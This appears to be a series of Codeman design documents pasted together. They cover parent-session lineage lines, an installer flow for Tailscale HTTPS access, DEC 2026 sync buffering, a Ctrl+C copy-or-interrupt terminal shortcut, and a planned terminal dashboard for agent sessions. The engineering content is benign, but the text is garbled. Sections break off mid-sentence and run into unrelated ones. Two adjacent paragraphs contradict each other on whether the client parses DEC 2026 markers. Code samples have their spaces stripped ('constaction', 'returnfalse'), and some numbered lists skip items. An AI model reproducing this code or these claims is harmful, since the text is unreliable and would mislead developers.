| request header | `X-Codeman-Parent-Session: <uuid>` | the skill: added **once** to the `CURL` array in the §0 preamble, so every present and future create call carries it with no per-recipe edit |
Rules, all of them deliberate:
- **Advisory decoration only.** It never grants access, never scopes anything, never
affects lifecycle. A child is not killed when its parent dies; the line just stops
being drawn once the parent tab is gone.
- **Never fails a spawn.** An unknown / stale / foreign parent id is silently dropped
(field ends up `undefined`), not a `400`. A cosmetic field must not be able to break
worker creation.
- **Resolved, not trusted.** The id must match a live session the caller can already
see (`canAccessOwned`), and the resolved parent's `owner` must equal the new
session's `owner`. Otherwise a user could staple their session under another user's
tab in multi-user mode.
- Exact id match first; a `>= 8`-char **unique** prefix match as a fallback (ids appear
truncated in mux names and UI surfaces; ambiguous prefixes resolve to nothing).
## 3. Server changes
| File | Change |
| --- | --- |
| `src/types/session.ts` | `SessionState.parentSessionId?: string` with a doc comment saying it is UI decoration and never a permission signal |
| `src/session.ts` | constructor option `parentSessionId` → `_parentSessionId`, public getter, emitted from `toState()` (~line 1170) |
| `src/web/schemas.ts` | `parentSessionId: z.string().max(100).optional()` on `CreateSessionSchema` (272) and `QuickStartSchema` (680). Neither is `.strict()`, so this is additive |
| `src/web/route-helpers.ts` | new `resolveParentSessionId(ctx, req, bodyValue, owner)` implementing §2's rules; returns `string \| undefined`, never throws |
| `src/web/routes/session-routes.ts` | pass it into the three `new Session({...})` sites: `POST /api/sessions` (846), `POST /api/run` (2522), `POST /api/quick-start` (2896) |
| `src/web/server.ts` | recovery path (~2617): `parentSessionId: savedState?.parentSessionId` so the link survives a restart |
**No new SSE event.**`session_created` / `session_updated` broadcast
`getSessionStateWithRespawn(session)`, which is `toState()`-derived, so the field rides
along to the browser for free — and the frontend already does
`this.sessions.set(data.id, data)`, so `session.parentSessionId` is simply there.
Optional follow-up: surface it on `/api/sessions/unified` rows so the Session Manager
and the home rails can show "spawned by w3-claudeman".
## 4. Frontend rendering
### 4.1 Where the code goes
`_updateConnectionLinesImmediate()` (`subagent-windows.js:242`) is a strict
**batched read → batched write** pass, and it already has an extension point:
ultracode appends its own layer via `_appendUltracodeConnectionLines(svg, rects)` at
the end, sharing the `rects` cache so no layer forces a second reflow.
Lineage lines follow that exactly: a new module `src/web/public/session-lineage.js`
(load order 15.6, after `ultracode-windows.js`) exporting
`_appendLineageConnectionLines(svg, rects)` onto `CodemanApp.prototype`, called from the
same tail. **The core function keeps ownership of the read/write split**; the new layer
only reads through the shared `rects` map and only appends paths.
The path math itself lives in `constants.js` as a pure
`computeLineagePath(parentRect, childRect, stripRect, depth)` — same treatment as
`computeTabScrollLeft`, so the geometry is unit-testable without a browser.
### 4.2 Geometry
Both endpoints are tabs in one horizontal strip, so the subagent shape (tab-bottom →
window-top) does not apply. **One case**, a **U-bridge hanging below the strip** that
Add a `tailscale` subcommand next to `update` / `uninstall` in the existing
dispatch. It runs `setup_tailscale_access()` against the already-installed
service (reads the port from the service file, requires an existing install).
This serves:
- existing installs that predate the feature,
- users who picked "this machine only" and changed their mind,
- every "skip for now" branch above, all of which print this exact command.
One implementation, two entry points. No separate `scripts/tailscale-setup.sh`
(unlike cloudflared, there is no long-running process for a `tunnel.sh`-style
start/stop wrapper to manage; tailscaled owns the lifecycle).
### 5. Non-interactive / automation
- `CODEMAN_TAILSCALE=1` presets choice 1 (analogous to presetting
`CODEMAN_HOST`). In non-interactive runs it only proceeds through states
that need no human (already installed + logged in + HTTPS-enabled tailnet);
anything requiring interaction (login URL, admin-console toggle, replacing a
foreign serve mapping) warns and falls back to loopback. It never installs
tailscale non-interactively.
- `CODEMAN_NONINTERACTIVE=1` with an existing serve mapping: preserve it, same
"never silently loosen/change" policy as `read_existing_binding`.
- Document both in the header comment block of install.sh (the env-var
reference at the top) and in the README.
## Edge cases and decisions
| Case | Decision |
| ---- | -------- |
| macOS GUI app without `tailscale` on PATH | `get_tailscale_path()` helper mirroring `get_cloudflared_path()`: check PATH, then `/Applications/Tailscale.app/Contents/MacOS/Tailscale`. All calls go through it. |
| Tailnet HTTPS certs disabled | Guided admin-console instructions + re-check loop; skip falls back to loopback. Never configure plain-HTTP serve. |
| Port 443 serve exists for another app | Prompt replace/skip; never `tailscale serve reset` (destroys unrelated mappings). |
| First cert issuance latency | Verify step retries ~30s and says why the first load may be slow. |
| `tailscale up` needs auth | Print the auth URL prominently, poll with timeout, skip gracefully. Works headless. |
| Custom `CODEMAN_PORT` | Serve target uses the actual port; `install.sh tailscale` re-reads it from the service file. |
| Funnel (public internet) | OUT OF SCOPE for v1. If ever added it must mirror the tunnel guard: refuse without `CODEMAN_PASSWORD` (`isUnauthenticatedNetworkAcknowledged`). Funnel exposes to the whole internet and is a different risk class than tailnet-only serve. Mention `tailscale funnel` in docs only, with the password warning. |
| Uninstall | Best effort: if `serve status --json` shows 443 proxying to our port, run the targeted `tailscale serve --https=443 off` (still accepted by current CLIs); if the CLI rejects it, print manual instructions. Never touch other mappings, never uninstall tailscale itself. |
| User already fronting Codeman some other way (reverse proxy etc.) | The serve check only looks at tailscale state; other proxies are invisible and unaffected (same stance as the loopback-exemption note in security-architecture). |
## What does NOT change
- Server code: no changes required. Host guard already trusts `.ts.net`,
loopback bind is already the default, SSE/WS already work through serve.
- The two existing binding options and their semantics, `read_existing_binding`
preservation, and the LAN+password flow.
- `scripts/tunnel.sh` / cloudflared support (stays as the "no Tailscale
account" alternative).
- The security model: this feature only ever narrows exposure (loopback +
authenticated overlay), never widens it.
## Files touched (implementation inventory)
| File | Change |
| ---- | ------ |
| `install.sh` | New: `check_tailscale`, `get_tailscale_path`, `tailscale_status_field` (jq-free JSON field extraction; the installer cannot assume jq: use `sed`/`grep` like existing helpers or `tailscale status --json` piped to `node -e` since node is guaranteed post-install), `offer_install_tailscale`, `ensure_tailscale_login`, `ensure_tailscale_operator`, `ensure_tailnet_https`, `setup_tailscale_serve`, `verify_tailscale_access`, `setup_tailscale_access` (orchestrator). Modified: `choose_network_binding` (3-way menu), summary block, `print_security_notice`, subcommand dispatch (`tailscale`), `uninstall` (targeted serve removal), header env-var docs (`CODEMAN_TAILSCALE`). |
| `README.md` | Remote-access section: promote the Tailscale path with the one-liner and `install.sh tailscale`; keep the tailscale-IP HTTP note for non-serve users but recommend serve + HTTPS. |
| `docs/security-architecture.md` | Section A gains "the installer can set this up for you" + `install.sh tailscale` pointer. |
| `CLAUDE.md` | One line in Scripts & Tunnel: installer offers Tailscale setup (`install.sh tailscale` to redo). |
| `test/` | No unit tests possible for interactive bash + a live tailnet; guard with `shellcheck install.sh` (already the norm) and the manual matrix below. |
- **Server shutdown**: Skips batching via `_isStopping` flag
- **Session switch**: Clears flicker filter state, pending writes, and sync timeout (prevents cross-session data bleed)
- **SSE reconnect**: `handleInit()` clears all pending write state
**Trade-off:** If a sync block is split across SSE packets and the end marker doesn't arrive within 50ms, the incomplete content is discarded. This prioritizes responsiveness over completeness. In practice this is rare since the server always sends complete `SYNC_START...SYNC_END` pairs and SSE typically delivers them atomically.
## DEC Mode 2026 Compatibility
Terminals that natively support DEC 2026 will buffer and render atomically. Terminals that don't support it ignore the escape sequences harmlessly. xterm.js doesn't support DEC 2026 natively, so the client implements its own buffering by parsing the markers.
Terminals that natively support DEC 2026 buffer and render atomically. Codeman uses xterm.js 6, so the client passes the markers through instead of parsing or discarding partial blocks.
Issue: [#211](https://github.com/Ark0N/Codeman/issues/211) "Terminal: Ctrl+C should copy when text is selected (interrupt otherwise)".
Origin: r/selfhosted feedback, "Biggest stumbling block is apparent lack of copy-paste in the terminal."
Status: **implemented and shipped** on 2026-08-05 (this document is kept as the rationale record). It was first served as an isolated beta over Tailscale for manual sign-off, then landed. Section 2 is the research that shaped the design, sections 4 to 6 describe what was built.
---
## 1. What the issue asks for
- Text selected in the terminal + `Ctrl+C` -> copy the selection, toast, clear the selection, do NOT send the byte to the PTY.
- No selection + `Ctrl+C` -> unchanged, the interrupt (`0x03`) reaches the PTY.
-`Ctrl+Shift+C` as an explicit copy chord.
- The selection check must run before the shortcut registry dispatch so a rebind cannot cost the user their interrupt key.
- Paste is out of scope (it already works via `Ctrl+V`, which terminal-ui.js routes to the image/text paste trap).
## 2. Verified current behavior
### 2.1 xterm cancels the Ctrl+C keydown, so no copy can happen
1. The custom handler runs **first**, before xterm evaluates the key. Returning `false` exits before `cancel(x)`, so returning `false` does **not** call `preventDefault()` for us.
2. When the handler returns `true`, xterm turns Ctrl+C into `0x03` and cancels the event, which is why the browser's own copy command never runs.
Probe (headless chromium against an isolated server on port 3174, selection active, real focus on `.xterm-helper-textarea`, synthetic Ctrl+C keydown):
So today: interrupt byte sent, clipboard untouched, and xterm drops the selection anyway. The last point matters, "copy then clear the selection" is not a behavior change in how the selection feels, it is what already happens on any keypress.
### 2.2 Why right-click Copy works today
xterm registers a `copy` listener on its root element that substitutes the selection text:
So a "return false and let the browser copy" implementation would also work in Chromium. It is rejected below (section 3.3) because it gives no toast, does not clear the selection, and leans on per-browser behavior of the copy command when the focused element is xterm's empty helper textarea.
### 2.3 The document-level capture handler will not interfere
`setupEventListeners()` in `src/web/public/app.js:989` runs on document capture, before xterm's textarea listener. Its registry loop skips any entry whose action is not in the local `SHORTCUT_ACTIONS` map:
```js
if(shortcut.disabled||!shortcut.action)continue;
constaction=SHORTCUT_ACTIONS[shortcut.action];
if(!action)continue;
```
This is exactly how `command-palette` already behaves: it is a full registry entry (rebindable and disableable in App Settings) whose dispatch happens in a dedicated, focus-aware gate rather than the generic loop. The new copy entry follows that pattern, so the capture handler falls through untouched and the terminal handler owns the decision.
### 2.4 Registry matching rules that constrain the bindings
`matchesShortcutEvent()` (`app.js:4890`):
- Ctrl and Cmd are interchangeable as the primary modifier, so a `['ctrl']` binding also matches Cmd+C on macOS. That is fine here: with a selection it copies (same result the native macOS path gives today), without one it falls through.
- Every other modifier must be declared exactly: `if (mods.includes('shift') !== !!e.shiftKey) return false`. So `Ctrl+Shift+C` needs its own binding, a plain `ctrl+c` binding will never swallow it.
-`binding.code` wins when present, otherwise `binding.key` is compared case-insensitively.
### 2.5 Where selection is actually possible
- The server strips mouse-tracking DECSETs for `claude`, `codex`, and `gemini` (`isAltScreenStripMode`, `src/session.ts:179`), which is why plain drag-select works in those tabs even though the TUI has mouse tracking on.
-`shell`, `opencode`, and `antigravity` keep mouse reporting, so xterm requires `Shift`+drag to force a selection there. Worth one line in the docs, it is not a code change.
- Touch devices deliberately disable selection entirely (`body.touch-device .terminal-container .xterm{user-select:none !important}`, `styles.css:3196`), and phones have no Ctrl key. This feature is desktop and hardware-keyboard only, with no mobile regression surface.
### 2.6 Helpers that already exist and should be reused
| Need | Existing code |
| --- | --- |
| Clipboard write with an HTTP-safe fallback | `_copyText(text)` in `app.js:1887` (Clipboard API, then hidden textarea + `execCommand`) |
| Toast | `showToast(message, type)` in `panels-ui.js:4385` |
| Translated string | `'Copied to clipboard'` already in `i18n.js:453` |
| Focus-aware chord gate to copy the shape of | `shouldOpenCommandPaletteFromShortcut(e)` in `panels-ui.js:285` |
| Buffer-wide copy (currently unreferenced) | `copyTerminal()` in `terminal-ui.js:2615` |
`_copyText` matters more than it looks: `install.sh`'s LAN option serves plain HTTP, where `navigator.clipboard` is undefined. The issue's suggested `navigator.clipboard.writeText` alone would silently do nothing for those users, the `execCommand` fallback covers them.
## 3. Design
### 3.1 Behavior
| Chord | Selection present | No selection |
| --- | --- | --- |
| `Ctrl+C` (and Cmd+C, per registry equivalence) | copy, toast, clear selection, swallow the key | fall through, xterm sends `0x03` (interrupt) |
| `Ctrl+Shift+C` | copy, toast, clear selection, swallow the key | swallow, no-op (see 3.2) |
| Shortcut disabled in App Settings | never copies, `Ctrl+C` is always the interrupt | unchanged |
| Rebound to another chord | that chord copies when a selection exists | plain `Ctrl+C` is always the interrupt |
### 3.2 Why `Ctrl+Shift+C` with no selection is swallowed rather than forwarded
Today `Ctrl+Shift+C` produces `0x03` as well (the shift is irrelevant to the control byte), so forwarding would be "no regression". But once the chord is advertised as *the explicit copy key*, letting it interrupt a running agent when the selection happens to be empty is a footgun with no upside. Swallowing costs nothing: a user who wants to interrupt has `Ctrl+C` right there.
The rule in code is "no selection and the matched chord had Shift -> swallow", not a hardcoded key check, so it stays correct under rebinds.
### 3.3 Why an explicit clipboard write rather than falling through to the native copy
Probe 2 showed the native path works in Chromium, but the explicit write is chosen because it:
- gives the "Copied to clipboard" toast, which is the discoverability half of the issue,
- clears the selection so a second `Ctrl+C` interrupts (the smart-copy contract),
- works on plain-HTTP LAN installs through `_copyText`'s `execCommand` fallback,
- does not depend on how each browser treats a copy command issued while an empty textarea has focus.
### 3.4 Why no new app setting
Per-shortcut enable/disable and rebinding already exist in App Settings -> Shortcuts and are driven by the registry. A user who wants "Ctrl+C is always interrupt" unchecks one box. Adding a `terminalSmartCopy` setting would duplicate that and would drag in the per-device vs synced decision (`displayKeys` + `.strict()``SettingsUpdateSchema`) for no gain.
## 4. Code changes, file by file
### 4.1 `src/web/public/app.js`, registry entry
Add to `DEFAULT_SHORTCUTS` (after the `clear-terminal` entry, ~line 351) so the Terminal group stays together:
```js
{
id:'copy-selection',
group:'Terminal',
label:'Copy Selection',
bindings:[
{modifiers:['ctrl'],key:'c'},
{modifiers:['ctrl','shift'],key:'C'},
],
// Dispatched by shouldCopyTerminalSelectionFromShortcut() in terminal-ui.js,
// deliberately NOT in SHORTCUT_ACTIONS: the generic capture loop always
// preventDefaults, which would cost the user the interrupt key.
action:'copyTerminalSelection',
},
```
Match on `key`, not `code`. xterm decides what byte to emit from the produced character, so intercepting the physical `KeyC` on a layout where it does not produce "c" would diverge from what xterm would have sent.
The `action` string is required for App Settings to render the row as configurable (`configurable = !!shortcut.action && Array.isArray(shortcut.bindings)`, `settings-ui.js:2624`). Do **not** add `copyTerminalSelection` to `SHORTCUT_ACTIONS`.
### 4.2 `src/web/public/terminal-ui.js`, the gate
New prototype method, modeled on `shouldOpenCommandPaletteFromShortcut`:
```js
shouldCopyTerminalSelectionFromShortcut(ev){
if(!ev||ev.type!=='keydown')returnfalse;// the handler also runs for keypress/keyup
if(!ev.ctrlKey&&!ev.metaKey&&!ev.altKey)returnfalse;// hot path: plain typing exits here
`preventDefault()` is explicit because returning `false` alone does not cancel the event (section 2.1), and without it the browser would run its own copy on top of ours.
### 4.4 `src/web/public/terminal-ui.js`, the copy action
// _copyText's execCommand fallback focuses a temp textarea; restore the
// terminal (this.terminal.focus is the CJK-aware router, not xterm's raw focus).
this.terminal.focus();
returnok;
}
```
The selection text is captured **before** the first `await`, and `navigator.clipboard.writeText` is reached in the same task as the keydown, so user activation still holds.
### 4.5 `src/web/public/i18n.js`
`'Copied to clipboard'` exists. Add `'Failed to copy': '复制失败'` (the error path is new to this surface).
### 4.6 Documentation
| File | Change |
| --- | --- |
| `README.md` shortcut table (~line 648) | `\| `Ctrl/Cmd+C` \| Copy selection (interrupts when nothing is selected) \|` and a `Ctrl+Shift+C` row |
| `src/web/public/index.html` help modal, Terminal section (~line 641) | `<div><kbd>Ctrl</kbd>+<kbd>C</kbd></div><div>Copy Selection / Interrupt</div>` plus the Ctrl+Shift+C row. Keep the existing negative assertion in `help-modal-shortcuts.test.ts` in mind (it forbids `Ctrl+K`, `C` is fine) |
| `CLAUDE.md` "Keyboard shortcuts" line | add `Ctrl+C` (copy selection, else interrupt) and `Ctrl+Shift+C` |
| `docs/architecture-invariants.md` -> "Command palette and shortcut registry" | append the invariant: the no-selection path must return `true` without `preventDefault`, the branch is keydown-only, and `copyTerminalSelection` must stay out of `SHORTCUT_ACTIONS` |
The shortcut overlay (`Ctrl+?`) and App Settings -> Shortcuts are registry-driven and pick the entry up with no edit.
## 5. Edge cases and risks
| Case | Handling |
| --- | --- |
| Handler also fires for `keypress`/`keyup` | gated on `ev.type === 'keydown'`. xterm's `_keyPress` bails on ctrl combos anyway, so no stray byte |
| CJK IME composing | the existing `isComposing || keyCode === 229` guard is the first line of the handler and stays first |
| Local echo overlay has unsent `pendingText` | the copy branch returns before `onData`, so `pendingText`, flushed offsets and the durable input queue are untouched. The no-selection path is byte-identical to today, including the "control char flushes buffered text then sends `0x03`" logic at `terminal-ui.js:895` |
| Plain HTTP (LAN install) | `_copyText` falls back to `execCommand`, then focus is restored |
| Clipboard write rejected (permissions policy, no gesture) | error toast, right-click Copy still available |
| Whitespace-only or empty selection | `getSelection()` empty string is treated as "no selection", so Ctrl+C still interrupts |
| macOS Cmd+C | registry treats ctrl/meta as interchangeable, so with a selection it takes our path (same visible result as today's native copy), without one it falls through |
| Chrome/Firefox `Ctrl+Shift+C` is the devtools inspect chord | browser-level and may still toggle devtools, our copy runs regardless. Document as a caveat, `Ctrl+C` is the primary path |
| Selection in a tab whose TUI owns the mouse (`shell`/`opencode`/`antigravity`) | unchanged, `Shift`+drag selects, then Ctrl+C copies |
| Web tab (iframe dashboard) focused | xterm handler never runs, browser-native copy inside the iframe |
| Teammate/subagent terminals (`panels-ui.js:2268`, `onData` wired) | same limitation exists there, out of scope for this PR (section 8) |
## 6. Test plan
New file `test/terminal-copy-selection.test.ts` (node env, `vm` harness in the style of `test/command-palette-ui.test.ts`), covering `shouldCopyTerminalSelectionFromShortcut` in isolation:
1. Ctrl+C keydown -> true, keyup/keypress of the same chord -> false.
3. Registry entry `disabled: true` -> false for every chord.
4. Rebound entry (for example Alt+Y) -> true for the rebind, false for Ctrl+C.
5. Missing registry (harness without `getShortcutRegistry`) -> falls back to the `c` check.
Static assertions appended to `test/keyboard-shortcuts.test.ts` (this suite already pins the xterm-handler chokepoint):
6.`DEFAULT_SHORTCUTS` contains `id: 'copy-selection'` and `SHORTCUT_ACTIONS` does **not** contain `copyTerminalSelection` (the interrupt-safety invariant).
7.`terminal-ui.js` contains the `shouldCopyTerminalSelectionFromShortcut` branch and a `return true` no-selection fall-through.
8. README + help modal rows exist (mirrors the existing palette/Alt-nav doc assertions).
New browser test `test/terminal-copy-shortcut.test.ts` (Playwright, port **3174**, free per a scan of `test/`), following `test/webgl-fallback.test.ts`: boot `WebServer`, grant `clipboard-read`/`clipboard-write`, `terminal.write()` a known line, `selectLines()`, real `page.keyboard.press('Control+c')`, then assert clipboard content, empty `onData` capture, cleared selection and the toast. Second case: no selection, assert `onData` saw `\u0003` and the clipboard is unchanged.
Per repo convention, browser suites are excluded from CI, so add the filename to the exclude list in `config/vitest.ci.config.ts` and run it locally.
Regression runs: `npm test -- test/keyboard-shortcuts.test.ts`, `test/help-modal-shortcuts.test.ts`, `test/command-palette-ui.test.ts`, `test/input-send-order.test.ts`, then `npm run test:ci`.
## 7. Manual verification before COM (CLAUDE.md rule)
Against a throwaway session on the live instance (`curl -sk https://localhost:3000/...`, never w1/w2/w3):
1. Select output with the mouse, press Ctrl+C, confirm the toast, paste elsewhere, confirm the agent did not stop.
2. Press Ctrl+C again with nothing selected, confirm the agent interrupts.
3. Type a few characters with local echo on (phone or `localEchoEnabled` forced), press Ctrl+C with no selection, confirm buffered text plus interrupt behave as before.
4. Uncheck the shortcut in App Settings -> Shortcuts, confirm Ctrl+C always interrupts even with a selection.
5. Rebind it, confirm the new chord copies and Ctrl+C reverts to pure interrupt.
6. Repeat 1 and 2 in an `opencode` or `shell` tab using Shift+drag to select.
7. Load over plain HTTP (`--host` LAN or `http://127.0.0.1:<port>`) and confirm the `execCommand` fallback copies and focus returns to the terminal.
8. Mobile smoke: confirm nothing changed (selection is CSS-disabled, no Ctrl key).
## 8. Out of scope, follow-ups worth filing separately
- **Teammate/subagent terminals** (`panels-ui.js:2268`) have the same blocked-copy problem. One `attachCustomKeyEventHandler` reusing `copyTerminalSelection` would fix them, but it touches a different surface and deserves its own change.
- **A mobile copy affordance.** Selection is disabled on touch, so phones still cannot copy terminal text. The unreferenced `copyTerminal()` (whole buffer) plus a keyboard-accessory "Copy" button would be the cheapest answer.
- **Right-click context menu** with Copy/Paste, better discoverability than any chord, but a bigger UI surface.
- **`copyTerminal()` cleanup**: it uses raw `navigator.clipboard` rather than `_copyText`, so it would fail on plain HTTP if ever wired up.
## 9. PR mechanics
- Branch off `master` (verify with `git branch --show-current`, the tree is shared), stage explicit paths only.
- Files touched: `src/web/public/app.js`, `src/web/public/terminal-ui.js`, `src/web/public/i18n.js`, `src/web/public/index.html`, `README.md`, `CLAUDE.md`, `docs/architecture-invariants.md`, `docs/terminal-copy-shortcut-plan.md`, three test files, `config/vitest.ci.config.ts`.
-`index.html`, `app.js` and `terminal-ui.js` are `.prettierignore`d hand-formatted assets, match the surrounding style by hand. `npm run check:public-assets` and `npm run check:frontend-syntax` are the guards.
- No changeset in this PR: a merged, unconsumed changeset turns the Release workflow red until the next COM, and the COM flow writes release notes covering everything since the last tag (current version is 1.10.0).
- Close #211 from the PR body.
Rough size: about 60 lines of product code, most of the work is the tests and the four documentation surfaces.
Status: **phases 0-2 implemented** on `feat/tui`; phases 3-4 remain follow-ups. The user guide is [`docs/tui.md`](tui.md); this document stays the design record.
- Phase 0: `src/cli-style.ts` (palette, glyphs, `heading`/`kv`/`table`/`spinner`/`confirm`) plus the mechanical fixes of §5, and `test/cli-commands.test.ts` now derives its inventory from the real commander `program` instead of parsing a fixture.
- Phases 1-2: `src/tui/`. `tui-app.ts` (main loop, attach handoff, verbs) and `tui-client.ts` (API, SSE, degraded enumeration) are the only IO; `tui-model`, `tui-layout`, `tui-render`, `tui-keys`, `tui-ansi`, `tui-composer`, `tui-approvals`, `tui-digest`, `tui-sse` and `tui-types` are pure and unit-tested, with an E2E suite driving the real binary under node-pty.
- Deferred with the rest of phase 3: `r` (resume a RECENT row) is not wired up, so the help overlay does not advertise it.
- Not started: phase 3 (mouse, `--pick` popup switcher, opt-in attach status line, OSC 9) and phase 4 (retiring the bash choosers).
The goal: replace Codeman's scattered terminal surfaces with one first-class TUI, `codeman tui`, that gives SSH/terminal users the same at-a-glance awareness the web UI gives browsers. The reference point is herdr (herdr.dev), the trending Rust "agent multiplexer" whose defining feature is a live agent-state sidebar. Codeman can match and beat that sidebar in the terminal because the states herdr infers from screen-scraping heuristics are states our server already computes from hooks, pane probing, and the approvals inbox.
---
## 1. What we have today (inventory)
Three disconnected surfaces, three visual idioms, two data sources:
| Surface | What it is | Data source | Idiom |
| --- | --- | --- | --- |
| `codeman` CLI (`src/cli.ts`, 1214 lines) | commander + chalk, ~20 commands | HTTP API + state files | `✓`/`✗` line-per-fact, no interactivity |
| `sc` (`scripts/tmux-chooser.sh`, 663 lines) | bash number-menu chooser, mobile-tuned (44 cols) | `tmux -L codeman` + `state.json` via jq | 256-color, numbered, full repaint per key |
Weaknesses found in the audit (file:line refs verified 2026-08-16):
1.**No interactive picker in the Node CLI at all.** Every `session stop`, `task status`, `session logs` requires a pasted UUID prefix. There is no `codeman attach <session>`; `codeman attach` is actually the attachment-card command (and `README.md:895` describes it wrongly).
2.**`sc` cannot reach sessions 10+ interactively**: entries are numbered globally (`tmux-chooser.sh:343`) but input accepts a single `[1-9]` keypress (`:487-493`). Page 2 shows items 8-14 that mostly cannot be selected.
3.**No cursor/selection concept in `sc`** (`BG_SEL` at `:90` is dead code); arrows only page.
4. The two bash tools can disagree about which sessions exist (different data files), and only `sc` is on PATH.
5.**Zero live feedback anywhere**: `codeman web -d` and `service install` block silently up to 30s (`daemon-control.ts:395-412`); no spinner exists in the codebase.
6. Styling drift: `doctor` is the only table and is deliberately monochrome with a colorize hook nobody wired up (`dependency-report.ts:5-7`); `codeman web` prints its "running at" line twice (colored `cli.ts:934`, plain `server.ts:2366`); the server's security warning is colorless `console.warn` while the CLI's version of the same warning is yellow; `tmux-manager.sh`'s header box is visibly misaligned; `padEnd(14)` overflows on "Antigravity CLI".
7. Bash TUIs emit raw escapes unconditionally (no TTY/NO_COLOR gate); `install.sh` and `postinstall.js` do it right.
8. Detach hint inconsistency: chooser says Ctrl+B D, `README.md:671` says Ctrl+A D.
9. Inside an attached session there is **no chrome at all**: Codeman turns the tmux status bar off (`tmux-manager.ts:1978`), so an SSH user in a pane has no session identity, no state, no way back to a picker except detach.
10.`test/cli-commands.test.ts` asserts against a hand-written fixture, not the real `program`, and that fixture already lists a `tui` command that does not exist (`:57-61`). The name is pre-approved by our own test file.
## 2. Research: how herdr does it
herdr (github.com/herdrdev/herdr, ~30k stars, single Rust binary, pre-1.0) is a background terminal multiplexer "your coding agents live on". What matters for us:
- **The agent-state sidebar is the product.** Every pane is classified live as `working` / `blocked` / `done` / `idle` and grouped in a sidebar, so you see who needs you without switching tabs. Reviews unanimously call this "the killer feature tmux can't match".
- **Detection is heuristic-first**: process-name matching + screen-manifest TOML rules parsing the visible frame; optional per-agent "integration install" adds lifecycle hooks over JSON-RPC on a unix socket for accurate states. Claude Code there is on the heuristic path and reviewers note blocked-state lag.
- **Model**: workspaces → tabs → panes, tmux-style prefix keys (Ctrl+B V split, arrows navigate, D detach), mouse-first (click select, drag resize, right-click menus, touch over SSH), adapts to narrow widths.
- **Agent-shaped API**: socket API with `pane read` (visible/recent/detection), `send-text`/`send-keys`/`run`, `agent start|prompt|wait|explain`, `pane wait-output` with regex, plugins placed as overlay/split/tab/popup.
- **Persistence**: sessions survive disconnects, reattach from any terminal / SSH.
- Weaknesses reviewers cite: pre-1.0 churn, bus factor 1, no session resurrection, rendering lag with many panes.
What is striking is how much of herdr Codeman already has, server-side: our hooks give exact `permission_prompt`/`stop`/`idle_prompt` events (herdr's "integration" path, but installed by default), `_confirmIdle()` does the screen-probe fallback, the approvals inbox parses the actual dialog options, and the agent skill + wait primitives are our socket API. What we lack is purely the presentation layer in the terminal.
Prior art for the architecture we want: **agent-deck** (Bubble Tea + tmux) proves the "TUI list + attach into tmux" model works great: session list with live glyphs (● ◐ ○ ✕), Enter attaches into a tmux pane, status polling, groups, fuzzy search. We take the shape, not the code.
Licensing note: herdr is reported variously as Apache-2.0/AGPL-3.0. Irrelevant either way: we copy concepts, never code.
### What we take / what we skip
Take: the four-state sidebar as the organizing principle; grouping by "needs you first"; narrow-width adaptation; mouse support; tmux-familiar keys; the "attention at a glance" framing.
Skip: being a multiplexer. tmux already backs every Codeman session and is a hard dependency; herdr had to build pane management because it owns terminals, we do not. Also skip (for now): plugin marketplace, split layouts, pane drag. Our TUI is a **dashboard + switchboard over tmux**, not a tmux replacement.
## 3. Design: `codeman tui`
One command, one full-screen client of the existing HTTP/SSE API.
**Positioning (owner decision, 2026-08-16): the web UI remains THE primary surface.** The TUI is strictly additive, for users who want a terminal workflow (SSH, Termius, tmux die-hards). Bare `codeman` keeps printing help; nothing existing changes behavior. The `sc` bash chooser also stays untouched for now; flipping its alias to `codeman tui` is deferred to a follow-up release once the TUI has mileage.
↑↓ select · ⏎ attach · 1-9 jump · y/n answer · p prompt · n new · x kill · / search · g digest
```
- **Header**: hostname/instance, server version, session count, plan-usage chip (same telemetry that feeds the web chip, when available). Degrades gracefully when the server is down (see §3.6).
- **Sidebar**: sessions grouped `NEEDS YOU` → `WORKING` → `IDLE` → `RECENT` (past sessions from the unified list, resumable). Within groups, reuse the activity ordering already built for the home screens in PR #303 (blocked first, running longest, quiet newest); that logic is pure and shared.
- **Preview pane**: live tail of the selected session, SGR colors preserved, cursor-movement stripped. When the selected session has a pending approval, the parsed dialog is rendered as a card above the tail with one-key answer bindings.
- **Footer**: contextual keymap (changes when a dialog/confirm is active).
### States and vocabulary
Exactly the web's language so the two surfaces read the same:
| NEEDS YOU (waiting for input) | `✋` | yellow | `idle_prompt` / waiting classification |
| WORKING | `✻` animating through `· ✢ ✳ ∗ ✻ ✽` at 2Hz | green | working classification (the same glyph family Claude itself draws, a deliberate nod) |
| IDLE | `○` | muted | idle |
| RECENT / done | `✔` | muted green | unified list history rows |
Nerd-font/glyph fallback exactly like `sc` does today (`[!] [w] [*] [-] [ok]` when the terminal is not known-capable), plus full NO_COLOR / `tput colors` degradation (8-color and mono renderings are designed, not accidental).
### Keymap
-`↑/↓` or `j/k` select · `Enter` attach · `1-9` jump-attach (parity with `sc`, but now the cursor covers 10+)
-`y`/`n` (or the digit keys) answer the selected session's pending approval right from the dashboard, via `POST /api/approvals/:id/answer`. The server already re-captures the pane and 409s if the dialog is gone, so this is safe by construction.
-`p` send a one-line prompt to the selected session without attaching (`POST /input` with `\r`, the composer opens in the footer)
-`n` new session (case picker → mode picker, drives `POST /api/quick-start`) · `x` kill with typed confirm (never bulk; refuses the session hosting the TUI itself, like tmux-manager.sh does)
-`/` fuzzy search across sessions/history/attachments (`GET /api/search`) · `g` away digest (`GET /api/away-digest`) rendered as a panel
-`r` resume selected RECENT row (unified list `resume-session` flow) · `?` help overlay · `q` quit
- Mouse (phase 3): SGR mouse reporting, click selects, wheel scrolls list/preview, click on footer keys triggers them. Works over SSH, same as herdr's touch story.
### Responsive behavior
The `sc` design constraint survives: below ~72 cols (Termius, iPhone portrait) the preview pane drops and the TUI is a single-column list with two-line rows, nearly identical to today's `sc` but with a cursor, live states, and the answer/prompt/new/kill verbs. The layout switch is width-driven at draw time, no mode flag.
### Attach model
Enter suspends the TUI (restore main screen + cooked mode), then hands the terminal to `tmux -L <socket> attach-session -t <name>` with `stdio: inherit`. On tmux exit/detach, the TUI resumes and refreshes. Full fidelity (mouse, paste, colors) is tmux's, we never proxy bytes.
- Inside tmux already: same socket → `switch-client -t`; different socket → warn about nesting and offer detach-first. `$TMUX` + `CODEMAN_MUX` detection.
- **Return path**: a tmux binding installed for codeman sessions (opt-in) runs `codeman tui --pick` inside `tmux display-popup -E`, a minimal picker-only mode (list + jump, no preview) so switching sessions from inside a pane is one keystroke, fzf-style.
- Optional per-attach chrome (opt-in setting, default off since `status off` at `tmux-manager.ts:1978` is deliberate): a minimal codeman-styled tmux status line showing `name · state · alert`, set on attach, restored on detach.
### Notifications
